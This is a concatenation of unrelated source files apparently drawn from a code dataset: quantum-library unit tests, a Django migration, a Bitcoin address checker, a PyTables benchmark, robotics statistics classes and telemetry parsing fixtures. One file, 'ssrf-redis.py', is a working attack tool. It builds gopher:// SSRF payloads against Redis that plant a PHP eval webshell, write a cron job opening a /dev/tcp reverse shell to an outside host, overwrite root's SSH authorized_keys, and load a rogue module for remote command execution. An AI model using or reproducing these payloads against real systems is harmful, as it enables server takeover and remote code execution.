-0.24230859 + 0.0j,
0.04282883 + 0.0j,
-0.00626025 + 0.0j,
],
[
0.24230859 + 0.0j,
0.90866411 + 0.0j,
-0.33183303 + 0.0j,
0.07418172 + 0.0j,
],
[
0.04282883 + 0.0j,
0.33183303 + 0.0j,
0.84809499 + 0.0j,
-0.41083747 + 0.0j,
],
[
0.00626025 + 0.0j,
0.07418172 + 0.0j,
0.41083747 + 0.0j,
0.90866411 + 0.0j,
],
],
dtype=jnp.complex64,
)
assert_equal(np.allclose(dp(0.25), dpmatrix), True)
# Tests border case with 0
for N in range(2, 50, 5):
assert_array_almost_equal(Displace(N)(0), jnp.eye(N))
@pytest.mark.parametrize(
"N, params, idx",
[
(2, [jnp.pi / 5.0, jnp.pi / 5.0], (1, 0)), # non-zero initiliazation on low dim
(3, [0.0, 0.0], (2, 0)), # zero initializatoin on low dim
(30, [0.0, 0.0], (1, 0)), # zero initialization on high dim
(
40,
[jnp.pi / 8.0, jnp.pi / 7.0],
(20, 15),
), # non-zero initialization on high dim
(10, [0.0, 2.0 * jnp.pi], (9, 8)), # sin is zero; cos isn't
(5, [jnp.pi / 3.0, jnp.pi / 3.0], (3, 2)), # both sin and cos don't vanish
(23, [jnp.pi / 2.0, jnp.pi / 2.0], (20, 0)), # cos vanishes; sin doesn't
(50, [3.0 * jnp.pi, 5 * jnp.pi], (30, 20)), # angles > 2pi
(64, [0.0, 0.0], (63, 62)), # checking corner indices on high dim
(75, [2.0 * jnp.pi, 2.0 * jnp.pi], (63, 62)),
(84, [jnp.pi, jnp.pi], (2, 0)),
(95, [jnp.pi / 4.0, jnp.pi / 4.0], (1, 0)),
],
)
def test_make_rot(N, params, idx):
"""Tests the `_make_rot` method"""
rotation = _make_rot(N, params, idx)
assert_array_almost_equal(jnp.dot(rotation, dag(rotation)), jnp.eye(N))
assert_array_almost_equal(jnp.dot(dag(rotation), rotation), jnp.eye(N))
class TestUnitary:
"""A test class for Unitary operators"""
@staticmethod
def generate_params(N, key=PRNGKey(0)):
"""Generator for generating parameterizing angles in `make_unitary`"""
for _ in range(3):
key, subkey = split(key)
thetas = uniform(
subkey, ((N * (N - 1) // 2),), minval=0.0, maxval=2 * jnp.pi
)
phis = uniform(subkey, ((N * (N - 1) // 2),), minval=0.0, maxval=2 * jnp.pi)
omegas = uniform(subkey, (N,), minval=0.0, maxval=2 * jnp.pi)
yield thetas, phis, omegas
def test_unitary(self):
for N in range(2, 30, 6):
for thetas, phis, omegas in TestUnitary.generate_params(N):
unitary = Unitary(N)(thetas, phis, omegas)
assert_array_almost_equal(jnp.dot(unitary, dag(unitary)), jnp.eye(N))
assert_array_almost_equal(jnp.dot(dag(unitary), unitary), jnp.eye(N))
def test_rand_ket_norm():
for N in range(2, 40, 6):
assert_almost_equal(jnp.linalg.norm(qgrad_rand_ket(N)), 1.0, decimal=5)
def test_rand_ket_seed():
for N in range(2, 30, 6):
# test same kets for the same seed
for seed in range(1000, 100):
assert_array_equal(qgrad_rand_ket(N, seed), qgrad_rand_ket(N, seed))
# test different kets for different user-provided seeds
for (seed1, seed2) in zip(range(0, 1000, 100), range(1000, 2000, 100)):
assert_raises(
AssertionError,
assert_array_equal,
qgrad_rand_ket(N, seed1),
qgrad_rand_ket(N, seed2),
)
'''
def test_rand_dm():
for N in range(2, 30, 6):
# check for a valid density matrix
assert isdm(qgrad_rand_dm(N)) == True
# test same density matrices for the same seed
for seed in range(1000, 100):
assert_array_equal(qgrad_rand_dm(N, seed), qgrad_rand_dm(N, seed))
# test different density matrices for different user-given seeds
for (seed1, seed2) in zip(range(0, 1000, 100), range(1000, 2000, 100)):
assert_raises(
AssertionError,
assert_array_equal,
qgrad_rand_dm(N, seed1),
qgrad_rand_dm(N, seed2),
)
'''
@pytest.mark.parametrize(
"oper, herm",
[
# check standard Hermitian matrices
(sigmax(), True),
(sigmay(), True),
(sigmaz(), True),
# check random hermitian matrices
(rand_herm(2).full(), True),
(rand_herm(4).full(), True),
(rand_herm(20).full(), True),
# check non-Hermitian matrices
(jnp.arange(9).reshape(3, 3), False),
(jnp.arange(16).reshape(4, 4), False),
],
)
def test_isherm(oper, herm):
assert isherm(oper) == herm
def test_isdm():
# Check when matrix is non-semi-positive-definite
non_spd = jnp.array([[1, 1], [-1, 1]])
assert isdm(non_spd) == False
# Check standard density matrices
assert isdm(to_dm(basis(2, 0))) == True
# Check when matrix is non-hermitian
assert isdm(sigmax() * sigmay()) == False
# Check when trace is non-unity
assert isdm(jnp.eye(2) * 2) == False
def test_rand_unitary():
for N in range(2, 43, 10):
unitary = rand_unitary(N)
assert_array_almost_equal(jnp.dot(unitary, dag(unitary)), jnp.eye(N))
assert_array_almost_equal(jnp.dot(dag(unitary), unitary), jnp.eye(N))
| 2.328125 | 2 |
ssrf-redis.py | kishorehariram/redis-ssrf | 59 | 12772939 | #!/usr/local/bin python
#coding=utf8
try:
from urllib import quote
except:
from urllib.parse import quote
def generate_info(passwd):
cmd=[
"info",
"quit"
]
if passwd:
cmd.insert(0,"AUTH {}".format(passwd))
return cmd
def generate_shell(filename,path,passwd,payload):
cmd=["flushall",
"set 1 {}".format(payload),
"config set dir {}".format(path),
"config set dbfilename {}".format(filename),
"save",
"quit"
]
if passwd:
cmd.insert(0,"AUTH {}".format(passwd))
return cmd
def generate_reverse(filename,path,passwd,payload): # centos
cmd=["flushall",
"set 1 {}".format(payload),
"config set dir {}".format(path),
"config set dbfilename {}".format(filename),
"save",
"quit"
]
if passwd:
cmd.insert(0,"AUTH {}".format(passwd))
return cmd
def generate_sshkey(filename,path,passwd,payload):
cmd=["flushall",
"set 1 {}".format(payload),
"config set dir {}".format(path),
"config set dbfilename {}".format(filename),
"save",
"quit"
]
if passwd:
cmd.insert(0,"AUTH {}".format(passwd))
return cmd
def generate_rce(lhost,lport,passwd,command="cat /etc/passwd"):
exp_filename="exp.so"
cmd=[
"SLAVEOF {} {}".format(lhost,lport),
"CONFIG SET dir /tmp/",
"config set dbfilename {}".format(exp_filename),
"MODULE LOAD /tmp/{}".format(exp_filename),
"system.exec {}".format(command.replace(" ","${IFS}")),
# "SLAVEOF NO ONE",
# "CONFIG SET dbfilename dump.rdb",
# "system.exec rm${IFS}/tmp/{}".format(exp_filename),
# "MODULE UNLOAD system",
"quit"
]
if passwd:
cmd.insert(0,"AUTH {}".format(passwd))
return cmd
def rce_cleanup():
exp_filename="exp.so"
cmd=[
"SLAVEOF NO ONE",
"CONFIG SET dbfilename dump.rdb",
"system.exec rm /tmp/{}".format(exp_filename).replace(" ","${IFS}"),
"MODULE UNLOAD system",
"quit"
]
if passwd:
cmd.insert(0,"AUTH {}".format(passwd))
return cmd
def redis_format(arr):
CRLF="\r\n"
redis_arr = arr.split(" ")
cmd=""
cmd+="*"+str(len(redis_arr))
for x in redis_arr:
cmd+=CRLF+"$"+str(len((x)))+CRLF+x
cmd+=CRLF
return cmd
def generate_payload(passwd,mode):
payload="test"
if mode ==0:
filename="shell.php"
path="/var/www/html"
shell="\n\n<?=eval($_GET[0]);?>\n\n"
cmd=generate_shell(filename,path,passwd,shell)
elif mode==1:
filename="root"
path="/var/spool/cron/"
shell="\n\n*/1 * * * * bash -i >& /dev/tcp/192.168.1.1/2333 0>&1\n\n"
cmd=generate_reverse(filename,path,passwd,shell.replace(" ","^"))
elif mode==2:
filename="authorized_keys"
path="/root/.ssh/"
pubkey="\n\nssh-rsa "
cmd=generate_sshkey(filename,path,passwd,pubkey.replace(" ","^"))
elif mode==3:
lhost="192.168.1.100"
lport="6666"
command="whoami"
cmd=generate_rce(lhost,lport,passwd,command)
elif mode==31:
cmd=rce_cleanup()
elif mode==4:
cmd=generate_info(passwd)
protocol="gopher://"
ip="127.0.0.1"
port="6379"
payload=protocol+ip+":"+port+"/_"
for x in cmd:
payload += quote(redis_format(x).replace("^"," "))
return payload
if __name__=="__main__":
# 0 for webshell ; 1 for re shell ; 2 for ssh key ;
# 3 for redis rce ; 31 for rce clean up
# 4 for info
# suggest cleaning up when mode 3 used
mode=3
# input auth passwd or leave blank for no pw
passwd = ''
p=generate_payload(passwd,mode)
print(p)
| 2.234375 | 2 |
rover/stats.py | wallarelvo/rover | 1 | 12772940 |
import point
import math
class MonteCarloArea(object):
def __init__(self, problem, num_sample_points):
self.num_sample_points = num_sample_points
self.problem = problem
self.total_efficiency = 0.0
self.number_of_updates = 0
self.moving_average = 0.0
self.learning_rate = 1.0
def update_average_efficiency(self, quads):
num_in = 0
total = 0
for _ in xrange(self.num_sample_points):
r_p = point.get_random_point(
self.problem.width, self.problem.height
)
for quad in quads:
old_x = r_p.x - quad.x
old_y = r_p.y - quad.y
beta_r = math.radians(quad.beta)
X = old_x * math.cos(-beta_r) - old_y * math.sin(-beta_r)
Y = old_y * math.cos(-beta_r) + old_x * math.sin(-beta_r)
r_ma = quad.get_ellipse_major()
r_mi = quad.get_ellipse_minor()
h = quad.get_ellipse_center_dist()
k = 0
el_eval_x = pow(X - h, 2) / float(pow(r_ma, 2))
el_eval_y = pow(Y - k, 2) / float(pow(r_mi, 2))
if el_eval_x + el_eval_y <= 1:
num_in += 1
break
total += 1
self.total_efficiency += float(num_in) / total
self.number_of_updates += 1
self.moving_average = (1 - self.learning_rate) * self.moving_average +\
self.learning_rate * float(num_in) / total
return self
def get_moving_average_efficiency(self):
return self.moving_average
def get_average_efficiency(self):
return self.total_efficiency / float(self.number_of_updates)
class SensorQualityAverage(object):
def __init__(self, planner):
self.moving_average = 0.0
self.learning_rate = 1.0
self.planner = planner
def update_average_sq(self, quads):
sub_total = 0.0
for quad in quads:
sub_total += self.planner.sq(quad.z, quad.phi)
self.moving_average = (1 - self.learning_rate) *\
self.moving_average + self.learning_rate *\
sub_total / len(quads)
return self
def get_moving_average(self):
return self.moving_average
class RiskAverage(object):
def __init__(self, planner):
self.moving_average = 0.0
self.learning_rate = 1.0
self.planner = planner
def update_average_risk(self, quads):
sub_total = 0.0
for quad in quads:
sub_total += self.planner.risk(quad.x, quad.y, quad.z)
self.moving_average = (1 - self.learning_rate) *\
self.moving_average + self.learning_rate *\
sub_total / len(quads)
return self
def get_moving_average(self):
return self.moving_average
class AverageTimeDifference(object):
def __init__(self, grid):
self.avg = 0.0
self.grid = grid
def update_average_time_difference(self, current_time):
inner_sum = 0.0
for x in xrange(self.grid.width):
for y in xrange(self.grid.height):
t = self.grid.get_raw(x, y)
inner_sum += (current_time - t)
self.avg = inner_sum / (self.grid.width * self.grid.height)
def get_average(self):
return self.avg
class AverageMotionBlur(object):
def __init__(self):
self.avg = 0.0
self.learning_rate = 1.0
def update(self, val):
self.avg = (1 - self.learning_rate) * self.avg\
+ val * self.learning_rate
return self
def get_average(self):
return self.avg
| 3.09375 | 3 |
src/api/migrations/0003_auto_20220328_0004.py | IkramKhan-DevOps/cs-neuro-ai | 0 | 12772941 | <gh_stars>0
# Generated by Django 3.2.12 on 2022-03-27 19:04
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('api', '0002_auto_20220327_2250'),
]
operations = [
migrations.AddField(
model_name='predication',
name='avg_vocal_fundamental_frequency',
field=models.IntegerField(default=0),
),
migrations.AddField(
model_name='predication',
name='d2',
field=models.IntegerField(default=0),
),
migrations.AddField(
model_name='predication',
name='dfa',
field=models.IntegerField(default=0),
),
migrations.AddField(
model_name='predication',
name='hnr',
field=models.IntegerField(default=0),
),
migrations.AddField(
model_name='predication',
name='jitter',
field=models.IntegerField(default=0),
),
migrations.AddField(
model_name='predication',
name='max_vocal_fundamental_frequency',
field=models.IntegerField(default=0),
),
migrations.AddField(
model_name='predication',
name='min_vocal_fundamental_frequency',
field=models.IntegerField(default=0),
),
migrations.AddField(
model_name='predication',
name='nhr',
field=models.IntegerField(default=0),
),
migrations.AddField(
model_name='predication',
name='ppe',
field=models.IntegerField(default=0),
),
migrations.AddField(
model_name='predication',
name='rpde',
field=models.IntegerField(default=0),
),
migrations.AddField(
model_name='predication',
name='shimmer',
field=models.IntegerField(default=0),
),
migrations.AddField(
model_name='predication',
name='spread1',
field=models.IntegerField(default=0),
),
migrations.AddField(
model_name='predication',
name='spread2',
field=models.IntegerField(default=0),
),
migrations.AddField(
model_name='predication',
name='status',
field=models.IntegerField(default=0),
),
migrations.AlterField(
model_name='predication',
name='audio',
field=models.FileField(help_text='Please record voice [15sec-45sec] voice must be .wmv format', upload_to='audios/'),
),
]
| 1.585938 | 2 |
src/btc/addr.py | ccebrecos/py-telegram-bot | 2 | 12772942 | """
https://rosettacode.org/wiki/Bitcoin/address_validation#Python
"""
# Libraries
from hashlib import sha256
# Constants
DIGITS_58 = '123456789ABCDEFGHJKLMNPQRSTUVWXYZabcdefghijkmnopqrstuvwxyz'
def decode_base58(addr, length):
n = 0
for char in addr:
n = n * 58 + DIGITS_58.index(char)
return n.to_bytes(length, 'big')
def check_addr(addr):
try:
# Get addr in bytes
addr_bytes = decode_base58(addr, 25)
# Retrieve checksum
cs = addr_bytes[-4:]
# Check equality
return cs == sha256(sha256(addr_bytes[:-4]).digest()).digest()[:4]
except Exception:
return False
| 3.3125 | 3 |
cv07/obvody_a_obsahy.py | xtompok/uvod-do-prg_20 | 3 | 12772943 | from obvody import obvod_ctverce, obvod_trojuhelnika, obvod_obdelnika, obvod_kruhu
import obsahy as o
# čtverec, obdélník, rovnostranný trojúhelník, kruh
typ = input("Zadej typ útvaru: ")
strana = int(input("Zadej délku strany / poloměr: "))
if typ == "ctverec":
obvod = obvod_ctverce(strana)
obsah = o.obsah_ctverce(strana)
elif typ == "obdelnik":
b = int(input("Zadej délku druhé strany: "))
obvod = obvod_obdelnika(strana,b)
obsah = o.obsah_obdelnika(strana,b)
elif typ == "trojuhelnik":
obvod = obvod_trojuhelnika(strana)
obsah = o.obsah_trojuhelnika(strana)
elif typ=="kruh":
obvod = obvod_kruhu(strana)
obsah = o.obsah_kruhu(strana)
else:
print("Zadal jsi neplatný tvar")
exit(1)
print(f"Obvod je {obvod} cm")
print(f"Obsah je {obsah} cm^2")
| 3.21875 | 3 |
examples/read_array_out_arg.py | scopatz/PyTables | 9 | 12772944 | # This script compares reading from an array in a loop using the
# tables.Array.read method. In the first case, read is used without supplying
# an 'out' argument, which causes a new output buffer to be pre-allocated
# with each call. In the second case, the buffer is created once, and then
# reused.
from __future__ import division
from __future__ import print_function
from __future__ import unicode_literals
import time
import numpy as np
import tables
def create_file(array_size):
array = np.ones(array_size, dtype='i8')
with tables.open_file('test.h5', 'w') as fobj:
array = fobj.create_array('/', 'test', array)
print('file created, size: {0} MB'.format(array.size_on_disk / 1e6))
def standard_read(array_size):
N = 10
with tables.open_file('test.h5', 'r') as fobj:
array = fobj.get_node('/', 'test')
start = time.time()
for i in range(N):
output = array.read(0, array_size, 1)
end = time.time()
assert(np.all(output == 1))
print('standard read \t {0:5.5f}'.format((end - start) / N))
def pre_allocated_read(array_size):
N = 10
with tables.open_file('test.h5', 'r') as fobj:
array = fobj.get_node('/', 'test')
start = time.time()
output = np.empty(array_size, 'i8')
for i in range(N):
array.read(0, array_size, 1, out=output)
end = time.time()
assert(np.all(output == 1))
print('pre-allocated read\t {0:5.5f}'.format((end - start) / N))
if __name__ == '__main__':
array_num_bytes = [int(x) for x in [1e5, 1e6, 1e7, 1e8]]
for array_bytes in array_num_bytes:
array_size = int(array_bytes // 8)
create_file(array_size)
standard_read(array_size)
pre_allocated_read(array_size)
print()
| 2.75 | 3 |
tlr/fixtures/temperature1.py | bpptkg/tlr | 0 | 12772945 | <filename>tlr/fixtures/temperature1.py
raw_data = [
b'\x1cT#01 61.01,\r\nT#03 88.07,90.78,90.17,29.48,14.41\r\n \r\n \xae$\xe2\x02\xe0D\x143P\x02\xe0',
b'T#01 56.92,\r\nT#03 88.10,90.62,90.42,29.68,14.39\r\n \r\n C \xfc',
b'T#01 63.51,\r\nT#03 87.98,90.36,90.15,29.30,14.41\r\n \r\n \x03\x82\x01\x80$\x9f\xd8\xbc\x0f\x08',
b'T#01 56.05,\r\nT#03 87.99,90.66,90.52,29.00,14.40\r\n \r\n \x080"',
b'T#01 59.20,\r\nT#03 88.17,91.09,90.62,28.79,14.41\r\n \r\n \x803\x06\x18\xf8',
b'T#01 52.21,\r\nT#03 87.93,90.57,90.56,28.65,14.40\r\n \r\n \xf83\x0b\x1c',
b'T#01 49.17,\r\nT#03 87.75,90.50,90.40,28.24,14.41\r\n \r\n :\x02@\x8c\x06',
b'T#01 45.93,\r\nT#03 87.86,91.08,90.75,27.81,14.42\r\n \r\n \x01\x80\xa1s\x86\xe7\x03\xfc',
b'T#01 50.86,\r\nT#03 87.79,90.61,90.53,27.23,14.43\r\n \r\n \x86\x16 \x80\xf0\xc7\xf2\xc0',
b'\x1e\x80\xf8T#01 47.12,\r\nT#03 87.54,90.59,90.41,26.66,14.42\r\n \r\n \xf1\x17a\x80\x02\xfe',
b'T#01 50.26,\r\nT#03 87.60,90.97,90.42,26.95,14.40\r\n \r\n \xc0\xf3[\xd3\x81\xfc9\xf5\xb8\x06\x80\xfe',
b'T#01 57.21,\r\nT#03 87.64,90.55,90.13,25.40,14.42\r\n \r\n \x04\x08\x93\x98\xd9\xfc',
b'T#01 54.55,\r\nT#03 87.86,90.88,90.43,25.55,14.40\r\n \r\n \x01\x80\t\x18\xc6!`\xfe',
b'#01 53.39,\r\nT#03 87.89,90.84,90.12,25.71,14.41\r\n \r\n \x01(\x12 \xfe',
b'T#01 52.59,\r\nT#03 88.06,90.75,90.29,26.29,14.40\r\n \r\n \xf2\x83l\x1e<\x90\x04',
b'\xfeT#01 54.47,\r\nT#03 87.93,90.83,90.04,26.48,14.41\r\n \r\n k|^y\xfe',
b'T#01 55.85,\r\nT#03 87.83,90.89,90.51,26.45,14.42\r\n \r\n \xc4\xd6>4\xfa',
b'T#01 52.55,\r\nT#03 87.59,90.84,90.53,25.37,14.42\r\n \r\n \x02:\\@\x84G\x01\x84',
b'T#01 54.72,\r\nT#03 87.76,90.86,90.25,25.36,14.40\r\n \r\n \x90\x80B\xc8;\x80\x0e\x80',
b'T#01 54.70,\r\nT#03 87.78,90.64,90.08,25.54,14.40\r\n \r\n \x88P\xc2\x06',
b'T#01 55.10,\r\nT#03 87.96,90.90,90.54,26.46,14.41\r\n \r\n @\xf0kT\xfc',
b'T#01 53.83,\r\nT#03 87.90,90.91,90.32,25.77,14.42\r\n \r\n \x12\x0e"\xf2 \xbb\x0f\x80',
b'T#01 54.64,\r\nT#03 87.99,90.50,90.26,26.15,14.43\r\n \r\n ',
b'T#01 53.13,\r\nT#03 87.85,91.07,90.40,25.94,14.43\r\n \r\n \x80\xf8',
b'T#01 60.26,\r\nT#03 87.62,91.09,90.31,25.16,14.42\r\n \r\n \x18A\x04',
b'T#01 56.29,\r\nT#03 87.71,91.03,90.17,24.70,14.40\r\n \r\n "\xc8H\xc0',
b'T#01 66.20,\r\nT#03 87.77,91.03,90.26,24.44,14.40\r\n \r\n ',
b'T#01 57.08,\r\nT#03 87.82,91.13,90.22,24.22,14.40\r\n \r\n \x01\x02\x80@\x04',
b'T#01 61.81,\r\nT#03 87.69,91.07,90.28,24.03,14.40\r\n \r\n \xf3',
b'T#01 59.01,\r\nT#03 87.73,90.70,90.07,23.99,14.42\r\n \r\n @\xfc',
b'T#01 56.05,\r\nT#03 87.69,91.02,90.36,24.32,14.40\r\n \r\n \xa0\x8f\x0b\x07\x01',
b'T#01 63.64,\r\nT#03 87.72,90.99,90.34,24.45,14.41\r\nT#01 64.58,\r\n \r\n \xfe',
b'\xfcT#01 67.45,\r\nT#03 87.80,90.83,90.22,24.52,14.42\r\n \r\n \x02\x04\xfe ,@\xa3\x03',
b'T#01 60.04,\r\nT#03 87.69,90.80,90.57,24.98,14.41\r\n \r\n \xe0\x01\x14',
b'T#01 59.57,\r\nT#03 87.72,90.96,90.57,25.91,14.42\r\n \r\n \x01\xe4s\xe10D\x03\xe0',
b'T#01 61.67,\r\nT#03 87.73,91.05,90.40,26.04,14.42\r\n \r\n \xe0\xfa\xe2\xc8\x84\x1e',
b'\x12\xf8T#01 85.78,\r\nT#03 87.71,91.21,90.41,25.67,14.39\r\n \r\n 2\x011\x95\x89\x80\r\xf0',
b'T#01 69.74,\r\nT#03 87.91,90.97,90.49,25.24,14.42\r\n \r\n \xf0',
b'T#01 65.01,\r\nT#03 87.93,90.61,90.60,25.28,14.41\r\n \r\n \x01\xf3HB',
b'T#01 63.63,\r\nT#03 87.97,90.90,90.92,26.12,14.40\r\n \r\n \xfe',
b'T#01 61.84,\r\nT#03 88.17,91.13,90.78,26.92,14.42\r\n \r\n \x80H\xf0',
b'T#01 65.72,\r\nT#03 87.72,90.93,90.51,26.14,14.40\r\n \r\n \xfe1\x8e',
b'T#01 61.01,\r\nT#03 87.61,90.94,90.65,25.93,14.40\r\n \r\n \x02\x1cH\xe0',
b'T#01 60.10,\r\nT#03 87.62,90.97,90.60,25.87,14.39\r\n \r\n \xf1',
b'T#01 61.83,\r\nT#03 87.83,91.03,90.29,25.60,14.43\r\n \r\n \xf8\xe8',
b'T#01 65.53,\r\nT#03 88.13,90.71,90.49,25.44,14.42\r\n \r\n \xc7a"\x12\x04',
b'T#01 67.88,\r\nT#03 87.83,91.02,90.20,25.28,14.42\r\n \r\n 0\x07@\x12D',
b'T#01 77.61,\r\nT#03 87.68,91.06,90.27,24.85,14.42\r\n \r\n \x800\xfb\x02\xdc\x03\x01\x1e',
b'T#01 67.28,\r\nT#03 87.94,91.08,90.61,24.95,14.40\r\n \r\n \xc0|\xdb\xe8g<',
b'T#01 63.90,\r\nT#03 87.86,90.98,90.53,24.97,14.43\r\n \r\n \xc7\x02\x80',
b'T#01 60.11,\r\nT#03 87.76,90.91,90.52,25.06,14.40\r\n \r\n ',
b'T#01 66.12,\r\nT#03 87.65,90.85,90.69,25.25,14.42\r\n \r\n \xe0\x02\x80X\t\x04@',
b'T#01 71.97,\r\nT#03 87.81,90.91,90.32,25.65,14.42\r\n \r\n \xc8\x06\x047',
b'T#01 66.58,\r\nT#03 87.79,91.06,90.35,25.46,14.43\r\n \r\n `\x80\x88\xa4\xfc',
b'T#01 58.96,\r\nT#03 87.32,90.92,90.27,25.17,14.39\r\n \r\n \x08\xfa',
b'T#01 58.30,\r\nT#03 87.23,90.91,90.43,24.80,14.41\r\n \r\n ',
b'T#01 56.55,\r\nT#03 87.35,90.98,90.50,24.71,14.39\r\n \r\n \xf8<-\x0c',
b'T#01 58.05,\r\nT#03 87.40,90.91,90.18,24.76,14.41\r\n \r\n \x05',
b'T#01 76.65,\r\nT#03 87.64,91.03,90.22,24.38,14.42\r\n \r\n `\x81\xc2\xc0#\x0c\x1c',
b'T#01 65.58,\r\nT#03 87.69,90.56,90.21,24.26,14.40\r\n \r\n \xc8',
b'T#01 62.54,\r\nT#03 87.65,90.73,90.48,24.64,14.42\r\n \r\n \x0e7\x124\r\xfe',
b'T#01 62.07,\r\nT#03 87.48,90.98,90.17,25.01,14.42\r\n \r\n \x80\xfea\x92\xc4\xae',
b'T#01 63.46,\r\nT#03 87.52,91.04,90.37,24.83,14.40\r\n \r\n \x80\xc0',
b'T#01 60.82,\r\nT#03 87.18,90.87,90.26,24.67,14.39\r\n \r\n \x03?h\x04\xb1\x98\t\x80\x0f\x81\x01\x80',
b'T#01 54.87,\r\nT#03 87.27,90.85,90.50,24.82,14.41\r\n \r\n \xfc(\x04B\x1c\xf0',
b'T#01 73.36,\r\nT#03 87.56,90\xfc\x04\x01\x12\x12\xf5\x1e0\x01\x80',
b'T#01 71.44,\r\nT#03 87.76,91.00,90.31,24.82,14.14\r\n \r\n \xc0t',
b'T#01 64.59,\r\nT#03 87.24,91.05,90.08,24.17,14.42\r\n \r\n \x02\xe0',
b'T#01 72.30,\r\nT#03 87.32,91.08,90.14,23.47,14.42\r\n \r\n @H\x80\x01\xa0\x19\x15\x03',
b'T#01 65.38,\r\nT#03 87.48,90.94,90.24,23.25,14.44\r\n \r\n \x03\x10\x06\x85l0\x18',
b'T#01 64.02,\r\nT#03 87.45,90.98,90.18,22.97,14.42\r\n \r\n \x80\xfe\x1b',
b'\x01\xf9T#01 87.72,\r\nT#03 87.60,91.12,90.06,22.60,14.27\r\n \r\n \x80\xf8\x8c\x10\x8b',
b'T#01 80.09,\r\nT#03 87.47,91.07,89.97,22.08,14.09\r\nT#01 86.17,\r\nT#03 87.47,91.09,90.05,21.94,14.04\r\n \r\n \xfcM\x06D\x06',
b'T#01 67.42,\r\nT#03 87.45,91.03,90.00,21.38,14.42\r\n \r\n \xfd9P\x0c\\\x04',
b'T#01 72.79,\r\nT#03 87.40,91.07,90.09,20.90,14.13\r\n \r\n \xc1\x03',
b'T#01 72.22,\r\nT#03 87.66,91.27,90.00,20.44,13.91\r\n \r\n \x10\x10\x80\x0c\xd0t\xc4\x17\x0c\x80',
b'T#01 71.30,\r\nT#03 87.56,91.18,90.11,20.04,13.76\r\n \r\n \x01\xea',
b'T#01 83.55,\r\nT#03 87.52,90.96,89.86,19.28,13.64\r\n \r\n \xf4',
b'T#01 77.06,\r\nT#03 87.75,91.30,90.21,18.97,13.49\r\n \r\n \xa0\x8a&\x02',
b'T#01 79.01,\r\nT#03 87.55,91.02,90.12,18.57,13.39\r\n \r\n \x0c\x03\x03\xc0\xe1\x80 \xfc',
b'T#01 91.21,\r\nT#03 87.67,91.03,90.01,18.39,13.28\r\n \r\n \xe6\x19\xd0\x01\xd0',
b'T#01 89.87,\r\nT#03 88.16,91.20,90.12,18.07,13.16\r\n \r\n \xe0\xc4\x90\xc2\x03\xf0',
b'T#01 89.64,\r\nT#03 87.91,90.82,89.80,17.45,13.08\r\n \r\n \x02\x02\x13\xc0c\xc8\x19\xfc',
b'T#01 88.11,\r\nT#03 87.94,90.98,89.85,17.33,13.01\r\n \r\n \x80\r\x18\xfe',
b'T#01 89.66,\r\nT#03 87.88,91.42,89.75,17.03,12.96\r\n \r\n \xc0x\x80\x08\xbd\x0f',
b'T#01 92.55,\r\nT#03 87.94,90.80,89.64,16.70,12.93\r\n \r\n \xfev\xa9\x04',
b'T#01 88.17,\r\nT#03 87.94,91.15,89.74,16.60,12.93\r\n \r\n \x050\x89\xc1\x81\xe7V\x06&',
b'T#01 92.07,\r\nT#03 87.76,90.92,89.62,16.64,12.93\r\n \r\n \xfc\x01<\xe0\x08\x04',
b'T#01 89.57,\r\nT#03 87.67,90.97,89.57,16.57,12.93\r\n \r\n \x01"\x80\x04\xfe',
b'T#01 88.74,\r\nT#03 88.18,91.11,90.09,16.61,12.93\r\n \r\n \x03\x060\xfe\x8f\x97\x0e\x170\x01\xc0',
b'T#01 88.81,\r\nT#03 87.98,90.89,89.86,16.19,12.95\r\n \r\n \xf0\x85\x0e8\xe8\x03',
b'T#01 95.93,\r\nT#03 87.88,90.96,90.01,16.06,12.96\r\n \r\n \xfa',
b'\xf8T#01 92.55,\r\nT#03 87.87,90.92,90.17,15.88,12.96\r\n \r\n \xc9\x08,',
b'T#01 93.25,\r\nT#03 87.74,90.88,89.86,15.81,12.96\r\n \r\n \xfe%m\x03\x91\x0f',
b'\x0c\xc0T#01 94.89,\r\nT#03 87.81,91.07,89.78,15.67,12.96\r\n \r\n \x01\xfa0\x08',
b'T#01 92.07,\r\nT#03 87.87,90.94,89.96,15.63,12.96\r\n \r\n \xfe\x0b\xe0\xc3',
b'T#01 97.30,\r\nT#03 87.75,91.06,90.04,15.38,12.96\r\n \r\n \x02@',
b'T#01 95.69,\r\nT#03 87.68,91.04,89.88,15.24,12.96\r\n \r\n \x900\xe4',
b'T#01 95.21,\r\nT#03 87.78,90.99,89.73,15.18,12.96\r\n \r\n C\xfe\x1cD\n\x89\x81',
b'T#01 91.75,\r\nT#03 87.90,90.96,89.65,15.18,12.96\r\n \r\n @\xf2,A',
]
clean_data = [
[['61.01', ], ],
[['56.92', ], ],
[['63.51', ], ],
[['56.05', ], ],
[['59.20', ], ],
[['52.21', ], ],
[['49.17', ], ],
[['45.93', ], ],
[['50.86', ], ],
[['47.12', ], ],
[['50.26', ], ],
[['57.21', ], ],
[['54.55', ], ],
[['53.39', ], ],
[['52.59', ], ],
[['54.47', ], ],
[['55.85', ], ],
[['52.55', ], ],
[['54.72', ], ],
[['54.70', ], ],
[['55.10', ], ],
[['53.83', ], ],
[['54.64', ], ],
[['53.13', ], ],
[['60.26', ], ],
[['56.29', ], ],
[['66.20', ], ],
[['57.08', ], ],
[['61.81', ], ],
[['59.01', ], ],
[['56.05', ], ],
[['63.64', ], ['64.58', ], ],
[['67.45', ], ],
[['60.04', ], ],
[['59.57', ], ],
[['61.67', ], ],
[['85.78', ], ],
[['69.74', ], ],
[['65.01', ], ],
[['63.63', ], ],
[['61.84', ], ],
[['65.72', ], ],
[['61.01', ], ],
[['60.10', ], ],
[['61.83', ], ],
[['65.53', ], ],
[['67.88', ], ],
[['77.61', ], ],
[['67.28', ], ],
[['63.90', ], ],
[['60.11', ], ],
[['66.12', ], ],
[['71.97', ], ],
[['66.58', ], ],
[['58.96', ], ],
[['58.30', ], ],
[['56.55', ], ],
[['58.05', ], ],
[['76.65', ], ],
[['65.58', ], ],
[['62.54', ], ],
[['62.07', ], ],
[['63.46', ], ],
[['60.82', ], ],
[['54.87', ], ],
[['73.36', ], ],
[['71.44', ], ],
[['64.59', ], ],
[['72.30', ], ],
[['65.38', ], ],
[['64.02', ], ],
[['87.72', ], ],
[['80.09', ], ['86.17', ], ],
[['67.42', ], ],
[['72.79', ], ],
[['72.22', ], ],
[['71.30', ], ],
[['83.55', ], ],
[['77.06', ], ],
[['79.01', ], ],
[['91.21', ], ],
[['89.87', ], ],
[['89.64', ], ],
[['88.11', ], ],
[['89.66', ], ],
[['92.55', ], ],
[['88.17', ], ],
[['92.07', ], ],
[['89.57', ], ],
